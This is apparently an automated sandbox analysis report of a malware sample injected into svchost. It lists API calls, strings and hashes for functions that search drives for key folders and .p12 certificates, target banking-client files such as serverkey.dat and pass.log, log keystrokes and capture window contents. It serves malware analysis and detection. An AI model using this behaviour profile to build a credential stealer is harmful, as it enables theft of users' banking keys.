String ID: 82C31CB5$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
API String ID: 1576442920-4244652874
Opcode ID: 082f09d6388cbf58c96b8d781d757390221bba64b3a40321ac2578f470d1a12b
Instruction ID: 6cf4f9e84f40e98a3ba9a695ee025706ec90e138cbbabd429458fd5191a74a5b
Opcode Fuzzy Hash: 082f09d6388cbf58c96b8d781d757390221bba64b3a40321ac2578f470d1a12b
Instruction Fuzzy Hash: C6D129309442968FDF168F24D85DBE67BE9EF85304F1886D4E88DD7241DBB1DA48CB90

Function 02C8BB20 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 345fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C8BB47
memset.MSVCRT ref: 02C8BB69
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8BB88
SetErrorMode.KERNEL32(00000001), ref: 02C8BBA1
GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8BCE4
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
GetLastError.KERNEL32 ref: 02C8BD28
IsUserAnAdmin.SHELL32 ref: 02C8BD30
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
SetLastError.KERNEL32(00000000), ref: 02C8BD46
SetErrorMode.KERNEL32(?), ref: 02C8BF52

Strings

found., xrefs: 02C8BC74
.zip, xrefs: 02C8BDA8
keys, xrefs: 02C8BD59
.txt, xrefs: 02C8BEA8
82C3184B, xrefs: 02C8BCDF, 02C8BCEA, 02C8BDE4, 02C8BDEF
path, xrefs: 02C8BE5E
asus, xrefs: 02C8BC8B
*.00*, xrefs: 02C8BC2E

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
String ID: *.00*$.txt$.zip$82C3184B$asus$found.$keys$path
API String ID: 3801700313-3967964990
Opcode ID: 2ccc76992e657d32ddd7d02eb9622968297ea05fd662e1f6c6d1d3d8a7a41782
Instruction ID: eb0aa9984d832d5777501823ad65b4b7dba08da0154381e56215e5f837fe31a9
Opcode Fuzzy Hash: 2ccc76992e657d32ddd7d02eb9622968297ea05fd662e1f6c6d1d3d8a7a41782
Instruction Fuzzy Hash: FFC1F4315087818FC716DF3894687ABBBE5AFC9348F188A5DE9C9C7250EB31DA09C791

Function 02C8D0C0 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 345fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C8D0E7
memset.MSVCRT ref: 02C8D109
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8D128
SetErrorMode.KERNEL32(00000001), ref: 02C8D141
GetDriveTypeA.KERNEL32(?), ref: 02C8D195
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
PathAddBackslashA.SHLWAPI(82C318F9), ref: 02C8D284
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
GetLastError.KERNEL32 ref: 02C8D2C8
IsUserAnAdmin.SHELL32 ref: 02C8D2D0
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
SetLastError.KERNEL32(00000000), ref: 02C8D2E6
SetErrorMode.KERNEL32(?), ref: 02C8D4F2

Strings

found., xrefs: 02C8D214
.zip, xrefs: 02C8D348
keys, xrefs: 02C8D2F9
.txt, xrefs: 02C8D448
path, xrefs: 02C8D3FE
82C318F9, xrefs: 02C8D27F, 02C8D28A, 02C8D384, 02C8D38F
asus, xrefs: 02C8D22B
*.00*, xrefs: 02C8D1CE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
String ID: *.00*$.txt$.zip$82C318F9$asus$found.$keys$path
API String ID: 3801700313-3805874492
Opcode ID: 425eb8cc08128ed1b95f4e296e8d3dab3b1afadf694fd2b6d9cf7f05b51b0efc
Instruction ID: aa9f37e62b3eb9a5c461c1e9d8a0575e99d5f0c0cb5e9c87025faf26779bf6c5
Opcode Fuzzy Hash: 425eb8cc08128ed1b95f4e296e8d3dab3b1afadf694fd2b6d9cf7f05b51b0efc
Instruction Fuzzy Hash: 4AC1D8715087818FC716DF349858BABBBE5AFC5349F148A5DE8CAD7280EB30D609C792

Function 02C8BBE9 Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294fileCOMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8BCE4
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
GetLastError.KERNEL32 ref: 02C8BD28
IsUserAnAdmin.SHELL32 ref: 02C8BD30
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
SetLastError.KERNEL32(00000000), ref: 02C8BD46
SetErrorMode.KERNEL32(?), ref: 02C8BF52

Strings

found., xrefs: 02C8BC74
.zip, xrefs: 02C8BDA8
keys, xrefs: 02C8BD59
.txt, xrefs: 02C8BEA8
82C3184B, xrefs: 02C8BCDF, 02C8BCEA, 02C8BDE4, 02C8BDEF
path, xrefs: 02C8BE5E
asus, xrefs: 02C8BC8B
*.00*, xrefs: 02C8BC2E

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
String ID: *.00*$.txt$.zip$82C3184B$asus$found.$keys$path
API String ID: 3516781098-3967964990
Opcode ID: 1f52f668baf0c2e699368ab5db4ddecb56b2d5b78d591a07ef66356118f56ea5
Instruction ID: 663f24dd68829ed58e38b891f7cb07a8d44e847048a019257ef6a73785fdd551
Opcode Fuzzy Hash: 1f52f668baf0c2e699368ab5db4ddecb56b2d5b78d591a07ef66356118f56ea5
Instruction Fuzzy Hash: D0A1E4315087868FC716DB3494687ABBBE5EFC934DF188A59E8C9C7210EB31DA09C791

Function 02C8D189 Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294fileCOMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 02C8D195
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
PathAddBackslashA.SHLWAPI(82C318F9), ref: 02C8D284
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
GetLastError.KERNEL32 ref: 02C8D2C8
IsUserAnAdmin.SHELL32 ref: 02C8D2D0
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
SetLastError.KERNEL32(00000000), ref: 02C8D2E6
SetErrorMode.KERNEL32(?), ref: 02C8D4F2

Strings

found., xrefs: 02C8D214
.zip, xrefs: 02C8D348
keys, xrefs: 02C8D2F9
.txt, xrefs: 02C8D448
path, xrefs: 02C8D3FE
82C318F9, xrefs: 02C8D27F, 02C8D28A, 02C8D384, 02C8D38F
asus, xrefs: 02C8D22B
*.00*, xrefs: 02C8D1CE

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
String ID: *.00*$.txt$.zip$82C318F9$asus$found.$keys$path
API String ID: 3516781098-3805874492
Opcode ID: 7e1c5c9da2f9c3035f93d04b31bb37274a3f15e89969deb067b6893d67ad4339
Instruction ID: ab943dccc9a927d00b5d65f13d034dea180e4f10a05dfd6fd7655d91402de88a
Opcode Fuzzy Hash: 7e1c5c9da2f9c3035f93d04b31bb37274a3f15e89969deb067b6893d67ad4339
Instruction Fuzzy Hash: 30A1F8315087858FC716DB349468BABBBE5AFC5349F18CA58E8CAC7240EB31D509C791

Function 02C71180 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C7119E
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F570), ref: 02C711BD
StrStrIA.SHLWAPI(00000000,java), ref: 02C711D5
StrStrIA.SHLWAPI(00000000,.exe), ref: 02C711EB
StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C7120F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71231
GetProcessHeap.KERNEL32(00000008,?), ref: 02C7124E
HeapAlloc.KERNEL32(00000000), ref: 02C71255
memset.MSVCRT ref: 02C71265
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71281
CreateThread.KERNEL32(00000000,00000000,02C89ED0,00000000,00000000,00000000), ref: 02C71295
StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C712B4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C712E5
GetProcessHeap.KERNEL32(00000008,?), ref: 02C71302
HeapAlloc.KERNEL32(00000000), ref: 02C71309
memset.MSVCRT ref: 02C71319
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71335
CreateThread.KERNEL32(00000000,00000000,02C8D540,00000000,00000000,00000000), ref: 02C71349
CreateThread.KERNEL32(00000000,00000000,02C8EB60,00000000,00000000,00000000), ref: 02C71386

Part of subcall function 02C89E20: PathAddBackslashA.SHLWAPI(82c3181f), ref: 02C89E47
Part of subcall function 02C89E20: PathFileExistsA.SHLWAPI(?), ref: 02C89EB0

GetHandleInformation.KERNEL32(00000000,?), ref: 02C7139E
CloseHandle.KERNEL32(00000000), ref: 02C713AF

Strings

java, xrefs: 02C711C9
.exe, xrefs: 02C711DF
serverkey.dat, xrefs: 02C712AE
.p12, xrefs: 02C71209

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
String ID: .exe$.p12$java$serverkey.dat
API String ID: 183229269-3502489836
Opcode ID: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
Instruction ID: 11bba8a6c2a8effb5c3e6ee5715992e5dc9e33b41e28deec2c99e8fae3ac34ab
Opcode Fuzzy Hash: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
Instruction Fuzzy Hash: 9151E671E8522576EB319A618C49FEB7E6CDF81B55F184354BD0DAA1C0EBB0DA00CAF4

Function 02C8B810 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 248COMMON

Download Yara Rule

APIs

Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75AF7390,?), ref: 02C8B83C
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C8B85B
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8B86D
CloseHandle.KERNEL32(00000000), ref: 02C8B87E
PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8B8A7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
GetLastError.KERNEL32 ref: 02C8B8EB
IsUserAnAdmin.SHELL32 ref: 02C8B8F3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
SetLastError.KERNEL32(00000000), ref: 02C8B90B
GetFileAttributesA.KERNEL32(?), ref: 02C8B941
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
PathAddBackslashA.SHLWAPI(82C3184B,?,?), ref: 02C8B9C7
PathAddBackslashA.SHLWAPI(82C3184B,ctunnel.exe,?,75AF7390,?), ref: 02C8BAA7
PathFileExistsA.SHLWAPI(?), ref: 02C8BB09

Strings

path_ctunnel.txt, xrefs: 02C8BA08
82C3184B, xrefs: 02C8B8A2, 02C8B8A9, 02C8B9C2, 02C8B9C9, 02C8BAA2, 02C8BAA9
\, xrefs: 02C8B95F
pass.log, xrefs: 02C8BAE8
ctunnel.exe, xrefs: 02C8B81C
ctunnel.zip, xrefs: 02C8B920

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
String ID: 82C3184B$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
API String ID: 3886636124-1512899095
Opcode ID: 367deeb493a039c938df00037e45f8181f248d5d1c5ccded8f08640811a96183
Instruction ID: 9745a22860d5e6ba97636dfaab07f19f23a1992d8541023edbfad4e199ed9e66
Opcode Fuzzy Hash: 367deeb493a039c938df00037e45f8181f248d5d1c5ccded8f08640811a96183
Instruction Fuzzy Hash: BB9139309446598FDB16DB24A858BE6BBF8EF86308F14C7D4E889D7241DB30DE49CB90

Function 02C90BE0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 165stringsynchronizationsleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C90C10
PathFindFileNameA.SHLWAPI(?), ref: 02C90C1D
PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02C90C32

Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E

StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02C90C7D
strstr.MSVCRT ref: 02C90C9D
strstr.MSVCRT ref: 02C90CAF
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90CDE
Sleep.KERNEL32(000003E8), ref: 02C90CEF
ReleaseMutex.KERNEL32(00000000), ref: 02C90CF6
GetHandleInformation.KERNEL32(00000000,?), ref: 02C90D08
CloseHandle.KERNEL32(00000000), ref: 02C90D19
GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C90D67
CharUpperA.USER32(?), ref: 02C90D7E
CharUpperA.USER32(?), ref: 02C90D87

Strings

interpro.ini, xrefs: 02C90D27
DefaultPrivateDir, xrefs: 02C90D5A
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02C90CD5
GKUZ=, xrefs: 02C90C77
General, xrefs: 02C90D5F
P0#v, xrefs: 02C90CF6
ISClient.cfg, xrefs: 02C90C2D, 02C90C40

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Handle$Process$CharCloseCreateInformationMutexNamePathUpperstrstr$AllocateExistsFindFreeModulePrivateProfileReadReleaseSizeSleepStringValidateWritememset
String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$interpro.ini
API String ID: 1392943061-2569638643
Opcode ID: 9fd8be4243b616d36701170732b719105e80b8738c4a2baab95a9a0f829c0218
Instruction ID: 36bb3138c4b6ac632d28e0c971c62c05d9625a71fc495c53c9344cf45005f770
Opcode Fuzzy Hash: 9fd8be4243b616d36701170732b719105e80b8738c4a2baab95a9a0f829c0218
Instruction Fuzzy Hash: 3F515C72D443955BEB228F28CC88BAA7BADEF84704F144698E58593241DB71F648CF51

Function 02C7C069 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 171windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 02C7C078
memset.MSVCRT ref: 02C7C0BB
GetWindowRect.USER32(00000000,00000000), ref: 02C7C0CB
GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C0E5
GetScrollBarInfo.USER32(00000000,000000FA,?,?,?,762330D0), ref: 02C7C100
GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,?,762330D0), ref: 02C7C12D
GetWindow.USER32(00000000,00000005), ref: 02C7C165
GetWindow.USER32(00000000), ref: 02C7C168
IsIconic.USER32(00000000), ref: 02C7C087

Part of subcall function 02C7B9D0: IsWindow.USER32(00000000), ref: 02C7B9ED
Part of subcall function 02C7B9D0: IsWindowVisible.USER32(00000000), ref: 02C7B9FC
Part of subcall function 02C7B9D0: GetWindowRect.USER32(00000000,?), ref: 02C7BA39
Part of subcall function 02C7B9D0: GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
Part of subcall function 02C7B9D0: PrintWindow.USER32(00000000,?,00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7BA55
Part of subcall function 02C7B9D0: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,762330D0,?,?,?,02C7843E), ref: 02C7BA7B
Part of subcall function 02C7B9D0: CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
Part of subcall function 02C7B9D0: GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
Part of subcall function 02C7B9D0: OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
Part of subcall function 02C7B9D0: SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
Part of subcall function 02C7B9D0: BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9

IsWindow.USER32(?), ref: 02C7C18E
IsIconic.USER32(?), ref: 02C7C19D
memset.MSVCRT ref: 02C7C1CE
GetWindowRect.USER32(?,00000000), ref: 02C7C1DB
GetWindowLongA.USER32(?,000000F0), ref: 02C7C1F2
GetScrollBarInfo.USER32(?,000000FA,0000003C,?,?,762330D0), ref: 02C7C21D
GetScrollBarInfo.USER32(?,000000FB,0000003C,?,?,762330D0), ref: 02C7C255
GetWindow.USER32(?,00000005), ref: 02C7C292
GetWindow.USER32(00000000), ref: 02C7C295

Strings

<, xrefs: 02C7C0F9
<, xrefs: 02C7C213

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
String ID: <$<
API String ID: 3463799249-213342407
Opcode ID: 177739d8dc674bb14e83d376c842133f055ce4819bffd8eeb7c026f821d27920
Instruction ID: b1d32d639a922d41fb39542d9b211e93deef972600654bc564f20758c79fc4a9
Opcode Fuzzy Hash: 177739d8dc674bb14e83d376c842133f055ce4819bffd8eeb7c026f821d27920
Instruction Fuzzy Hash: F7613871D042299FDF15CFA8DC84BDEBBB9BF48714F14429AE419A7280DB706A41CF91

Function 02C81B80 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 169memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C81BB2

Part of subcall function 02C81AC0: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
Part of subcall function 02C81AC0: GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
Part of subcall function 02C81AC0: HeapValidate.KERNEL32(00000000), ref: 02C81B4A
Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
Part of subcall function 02C81AC0: HeapFree.KERNEL32(00000000), ref: 02C81B5A

GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02C81C15
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C1C
memset.MSVCRT ref: 02C81C2F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02C81C3F
HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02C81C46
GetProcessHeap.KERNEL32(00000008,02C83142,?,?,?,00000000), ref: 02C81C66
HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C6D

Strings

[ret], xrefs: 02C81CC0
[bks], xrefs: 02C81CA8
[del], xrefs: 02C81CEB
[ins], xrefs: 02C81D00
[tab], xrefs: 02C81CD6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
String ID: [bks]$[del]$[ins]$[ret]$[tab]
API String ID: 4095246728-233650549
Opcode ID: 1fe5b6ceba38fa2ef0e36c1ed7f9f926612c882d500b9cf1e6cc991abbf892d1
Instruction ID: 7c5269ea7c08bc0399d571e4fe4db444f479d83ea25b64e7ed57dd8896304e30
Opcode Fuzzy Hash: 1fe5b6ceba38fa2ef0e36c1ed7f9f926612c882d500b9cf1e6cc991abbf892d1
Instruction Fuzzy Hash: 6751B171D40259EBCB06DF68D844BEABBF4EF85704F08C69AE9599B340E7709605CFA0

Function 02C92320 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C92337
PathFindFileNameA.SHLWAPI(?), ref: 02C92344
GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C92394
CharUpperA.USER32(?), ref: 02C923AC
CharUpperA.USER32(?), ref: 02C923B5
StrStrIA.SHLWAPI(?,?), ref: 02C923C5

Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(82C31D7D), ref: 02C921B0
Part of subcall function 02C92180: CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
Part of subcall function 02C92180: GetLastError.KERNEL32 ref: 02C921FB
Part of subcall function 02C92180: IsUserAnAdmin.SHELL32 ref: 02C92203
Part of subcall function 02C92180: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
Part of subcall function 02C92180: SetLastError.KERNEL32(00000000), ref: 02C9221B
Part of subcall function 02C92180: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(82C31D7D,?,02C923DC), ref: 02C92297

PathAddBackslashA.SHLWAPI(82C31D7D), ref: 02C923E6

Strings

interpro.ini, xrefs: 02C92352
DefaultPrivateDir, xrefs: 02C9238A
82C31D7D, xrefs: 02C923E1, 02C923F1
General, xrefs: 02C9238F
STF, xrefs: 02C923EC

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
String ID: 82C31D7D$DefaultPrivateDir$General$STF$interpro.ini
API String ID: 2256374885-1638666600
Opcode ID: b66f6dc5e5c46e1dbcd552899d16f3e85ff613814c317f93073df216e5ed2817
Instruction ID: bd3d41e6ccc1ab58686192a431e20eef7b7d56b6ab04b4250f60db2969be4403
Opcode Fuzzy Hash: b66f6dc5e5c46e1dbcd552899d16f3e85ff613814c317f93073df216e5ed2817
Instruction Fuzzy Hash: B111B7B5980258AFEB11DB64DC88FD7777DEF94700F0087D5E94997140DAB09694CF50

